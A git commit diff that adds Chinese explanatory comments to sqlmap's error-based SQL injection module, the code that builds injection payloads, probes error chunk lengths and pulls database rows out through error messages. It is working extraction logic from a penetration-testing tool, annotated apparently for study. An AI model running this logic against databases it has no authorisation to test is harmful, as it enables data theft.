add comments to error/use.py

pull/3/head
wang 3 months ago
parent 7002527436
commit df472ac52d

@ -5,6 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入需要的模块
from __future__ import print_function
import re
@ -63,98 +64,127 @@ from lib.utils.safe2bin import safecharencode
from thirdparty import six
def _oneShotErrorUse(expression, field=None, chunkTest=False):
offset = 1
rotator = 0
partialValue = None
threadData = getCurrentThreadData()
retVal = hashDBRetrieve(expression, checkConf=True)
"""
执行单次基于错误的SQL注入查询
参数:
expression - 要执行的SQL表达式
field - 要查询的字段名(可选)
chunkTest - 是否为分块测试模式(用于确定最佳查询长度)
返回:
查询结果
"""
# 初始化变量
offset = 1 # 结果偏移量,用于分块获取数据
rotator = 0 # 旋转字符索引,用于显示进度
partialValue = None # 存储部分查询结果
threadData = getCurrentThreadData() # 获取当前线程数据
retVal = hashDBRetrieve(expression, checkConf=True) # 尝试从缓存中获取结果
# 如果缓存的结果包含部分值标记,则提取部分值
if retVal and PARTIAL_VALUE_MARKER in retVal:
partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue))
offset += len(partialValue)
offset += len(partialValue) # 调整偏移量继续获取剩余数据
# 标记是否从缓存恢复数据
threadData.resumed = retVal is not None and not partialValue
# 对特定数据库进行错误分块长度检测
# 这是为了找到最佳的查询长度,避免数据库截断结果
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode:
debugMsg = "searching for error chunk length..."
logger.debug(debugMsg)
seen = set()
current = MAX_ERROR_CHUNK_LENGTH
seen = set() # 记录已测试过的长度
current = MAX_ERROR_CHUNK_LENGTH # 从最大长度开始测试
# 二分查找最佳长度
while current >= MIN_ERROR_CHUNK_LENGTH:
testChar = str(current % 10)
testChar = str(current % 10) # 测试字符
# 根据不同数据库构造测试查询
if Backend.isDbms(DBMS.ORACLE):
testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar)
else:
testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current)
testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery)
# 执行测试查询
result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True))
seen.add(current)
# 分析测试结果确定分块长度
if (result or "").startswith(testChar):
if result == testChar * current:
kb.errorChunkLength = current
kb.errorChunkLength = current # 找到合适的长度
break
else:
result = re.search(r"\A\w+", result).group(0)
candidate = len(result) - len(kb.chars.stop)
current = candidate if candidate != current and candidate not in seen else current - 1
else:
current = current // 2
current = current // 2 # 二分缩小范围
# 保存找到的分块长度
if kb.errorChunkLength:
hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength)
else:
kb.errorChunkLength = 0
# 如果没有缓存结果或者有部分值,执行实际查询
if retVal is None or partialValue:
try:
while True:
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
# 定义用于提取结果的正则表达式
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) # 完整结果匹配
trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start # 截断结果匹配
# 处理字段转换
if field:
nulledCastedField = agent.nullAndCastField(field)
nulledCastedField = agent.nullAndCastField(field) # 转换字段格式
# 对特定数据库进行分块处理
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest:
extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0)
if extendedField != field: # e.g. MIN(surname)
if extendedField != field: # 处理聚合函数,如MIN(surname)
nulledCastedField = extendedField.replace(field, nulledCastedField)
field = extendedField
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength)
# Forge the error-based SQL injection request
vector = getTechniqueData().vector
query = agent.prefixQuery(vector)
query = agent.suffixQuery(query)
injExpression = expression.replace(field, nulledCastedField, 1) if field else expression
injExpression = unescaper.escape(injExpression)
injExpression = query.replace("[QUERY]", injExpression)
payload = agent.payload(newValue=injExpression)
# 构造注入payload
vector = getTechniqueData().vector # 获取注入向量
query = agent.prefixQuery(vector) # 添加前缀
query = agent.suffixQuery(query) # 添加后缀
injExpression = expression.replace(field, nulledCastedField, 1) if field else expression # 替换字段
injExpression = unescaper.escape(injExpression) # 转义特殊字符
injExpression = query.replace("[QUERY]", injExpression) # 构造最终查询
payload = agent.payload(newValue=injExpression) # 生成payload
# Perform the request
# 发送HTTP请求
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
incrementCounter(getTechnique())
incrementCounter(getTechnique()) # 增加计数器
# 处理特殊字符转义
if page and conf.noEscape:
page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page)
# Parse the returned page to get the exact error-based
# SQL injection output
# 从返回内容中提取结果
output = firstNotNone(
extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
extractRegexResult(check, page), # 从页面内容提取
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), # 从错误信息提取
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), # 从响应头提取
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) # 从重定向信息提取
)
# 处理输出结果
if output is not None:
output = getUnicode(output)
output = getUnicode(output) # 转换为Unicode
else:
# 处理被截断的结果
trimmed = firstNotNone(
extractRegexResult(trimCheck, page),
extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
@ -163,12 +193,14 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
)
if trimmed:
# 警告可能的结果截断
if not chunkTest:
warnMsg = "possible server trimmed output detected "
warnMsg += "(due to its length and/or content): "
warnMsg += safecharencode(trimmed)
logger.warning(warnMsg)
# 尝试提取部分结果
if not kb.testMode:
check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2]
output = extractRegexResult(check, trimmed, re.IGNORECASE)
@ -179,78 +211,105 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
else:
output = output.rstrip()
# 处理不同数据库的结果拼接
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)):
if offset == 1:
retVal = output
retVal = output # 第一块直接赋值
else:
retVal += output if output else ''
retVal += output if output else '' # 后续块拼接
# 判断是否需要继续获取下一块
if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest:
offset += kb.errorChunkLength
offset += kb.errorChunkLength # 增加偏移量
else:
break
break # 获取完成
# 显示进度
if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)):
if kb.fileReadMode:
if kb.fileReadMode: # 文件读取模式
dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
elif offset > 1:
elif offset > 1: # 显示旋转进度条
rotator += 1
if rotator >= len(ROTATING_CHARS):
rotator = 0
dataToStdout("\r%s\r" % ROTATING_CHARS[rotator])
else:
retVal = output
retVal = output # 其他数据库直接返回结果
break
except:
# 异常处理,保存部分结果
if retVal is not None:
hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER))
raise
retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal
# 处理结果编码
retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal # 十六进制解码
if isinstance(retVal, six.string_types):
retVal = htmlUnescape(retVal).replace("<br>", "\n")
retVal = htmlUnescape(retVal).replace("<br>", "\n") # HTML解码
retVal = _errorReplaceChars(retVal)
retVal = _errorReplaceChars(retVal) # 替换特殊字符
# 缓存结果
if retVal is not None:
hashDBWrite(expression, retVal)
else:
# 从缓存结果中提取数据
_ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
retVal = extractRegexResult(_, retVal) or retVal
return safecharencode(retVal) if kb.safeCharEncode else retVal
def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False):
values = []
origExpr = None
"""
获取错误注入查询的字段值
参数:
expression - SQL表达式
expressionFields - 表达式中的字段
expressionFieldsList - 字段列表
num - 行号(可选)
emptyFields - 空字段列表(可选)
suppressOutput - 是否抑制输出
返回:
字段值列表
"""
values = [] # 存储所有字段的值
origExpr = None # 保存原始表达式
width = getConsoleWidth()
threadData = getCurrentThreadData()
width = getConsoleWidth() # 获取控制台宽度
threadData = getCurrentThreadData() # 获取当前线程数据
# 遍历所有字段
for field in expressionFieldsList:
output = None
# 跳过ROWNUM字段
if field.startswith("ROWNUM "):
continue
# 处理行号限制
if isinstance(num, int):
origExpr = expression
expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])
# 替换表达式中的字段
if "ROWNUM" in expressionFieldsList:
expressionReplaced = expression
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
# 执行查询获取字段值
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
# 检查线程是否需要继续
if not kb.threadContinue:
return None
# 输出结果
if not any((suppressOutput, kb.bruteMode)):
if kb.fileReadMode and output and output.strip():
print()
@ -262,6 +321,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
dataToStdout("%s\n" % status)
# 恢复原始表达式
if isinstance(num, int):
expression = origExpr
@ -271,72 +331,96 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
def _errorReplaceChars(value):
"""
Restores safely replaced characters
还原安全替换的字符
参数:
value - 需要还原的字符串
返回:
还原后的字符串
"""
retVal = value
if value:
retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
# 替换特殊字符
retVal = retVal.replace(kb.chars.space, " ") # 空格
retVal = retVal.replace(kb.chars.dollar, "$") # 美元符号
retVal = retVal.replace(kb.chars.at, "@") # @符号
retVal = retVal.replace(kb.chars.hash_, "#") # #符号
return retVal
def _formatPartialContent(value):
"""
Prepares (possibly hex-encoded) partial content for safe console output
格式化部分内容用于安全的控制台输出
参数:
value - 需要格式化的值
返回:
格式化后的字符串
"""
if value and isinstance(value, six.string_types):
try:
value = decodeHex(value, binary=False)
value = decodeHex(value, binary=False) # 尝试十六进制解码
except:
pass
finally:
value = safecharencode(value)
value = safecharencode(value) # 安全编码
return value
def errorUse(expression, dump=False):
"""
Retrieve the output of a SQL query taking advantage of the error-based
SQL injection vulnerability on the affected parameter.
利用基于错误的SQL注入漏洞获取查询结果
这是主要的入口函数
参数:
expression - SQL表达式
dump - 是否为转储模式
返回:
查询结果
"""
# 初始化注入技术
initTechnique(getTechnique())
abortedFlag = False
count = None
emptyFields = []
start = time.time()
startLimit = 0
stopLimit = None
value = None
# 初始化变量
abortedFlag = False # 中断标记
count = None # 结果计数
emptyFields = [] # 空字段列表
start = time.time() # 开始时间
startLimit = 0 # 起始限制
stopLimit = None # 结束限制
value = None # 结果值
# 获取表达式字段信息
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
# Set kb.partRun in case the engine is called from the API
# 设置部分运行标记(API模式)
kb.partRun = getPartRun(alias=False) if conf.api else None
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
# entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
# 检查SQL查询是否可能返回多条记录
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
# 添加限制条件
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond:
# Count the number of SQL query entries output
# 计算查询结果数量
countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
# 移除ORDER BY子句(计数时不需要)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
# 获取计数结果
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields))
# 处理结果数量
if isNumPosStrValue(count):
# 限制最大结果数
if isinstance(stopLimit, int) and stopLimit > 0:
stopLimit = min(int(count), int(stopLimit))
else:
@ -347,6 +431,7 @@ def errorUse(expression, dump=False):
logger.debug(debugMsg)
elif count and not count.isdigit():
# 无法计数时假设只有一条结果
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
@ -356,15 +441,18 @@ def errorUse(expression, dump=False):
stopLimit = 1
elif not isNumPosStrValue(count):
# 处理空结果
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
logger.warning(warnMsg)
else:
value = [] # for empty tables
value = [] # 空表
return value
# 多线程处理多条记录
if isNumPosStrValue(count) and int(count) > 1:
# 询问是否移除ORDER BY以提高速度
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
message = "due to huge table size do you want to remove "
message += "ORDER BY clause gaining speed over consistency? [y/N] "
@ -372,26 +460,30 @@ def errorUse(expression, dump=False):
if readInput(message, default='N', boolean=True):
expression = expression[:expression.index(" ORDER BY ")]
# 设置线程数
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData = getCurrentThreadData()
try:
# 创建结果范围迭代器
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
# 初始化共享数据
threadData.shared.value = BigArray() # 存储结果
threadData.shared.buffered = [] # 缓冲区
threadData.shared.counter = 0 # 计数器
threadData.shared.lastFlushed = startLimit - 1 # 最后刷新位置
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 # 是否显示进度
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
# 检查空列
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList:
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
@ -400,17 +492,23 @@ def errorUse(expression, dump=False):
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
# 对大量数据禁用恢复信息显示
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
# 执行多线程查询
try:
def errorThread():
"""
错误注入查询线程函数
"""
threadData = getCurrentThreadData()
while kb.threadContinue:
# 获取下一个查询范围
with kb.locks.limit:
try:
threadData.shared.counter += 1
@ -418,51 +516,63 @@ def errorUse(expression, dump=False):
except StopIteration:
break
# 执行查询
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
if not kb.threadContinue:
break
# 处理单值结果
if output and isListLike(output) and len(output) == 1:
output = unArrayizeValue(output)
# 保存结果
with kb.locks.value:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(threadData.shared.counter)
# 按顺序插入结果
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, output))
# 刷新连续的结果
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
threadData.shared.lastFlushed += 1
threadData.shared.value.append(threadData.shared.buffered[0][1])
del threadData.shared.buffered[0]
# 运行多线程
runThreads(numThreads, errorThread)
except KeyboardInterrupt:
# 处理用户中断
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warning(warnMsg)
finally:
# 保存剩余结果
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
value = threadData.shared.value
kb.suppressResumeInfo = False
# 单条记录查询
if not value and not abortedFlag:
value = _errorFields(expression, expressionFields, expressionFieldsList)
# 处理返回结果格式
if value and isListLike(value):
if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))):
value = unArrayizeValue(value)
value = unArrayizeValue(value) # 单值结果
elif len(value) > 1 and stopLimit == 1:
value = [value]
value = [value] # 多值结果
# 计算执行时间
duration = calculateDeltaSeconds(start)
# 输出调试信息
if not kb.bruteMode:
debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration)
logger.debug(debugMsg)

Loading…
Cancel
Save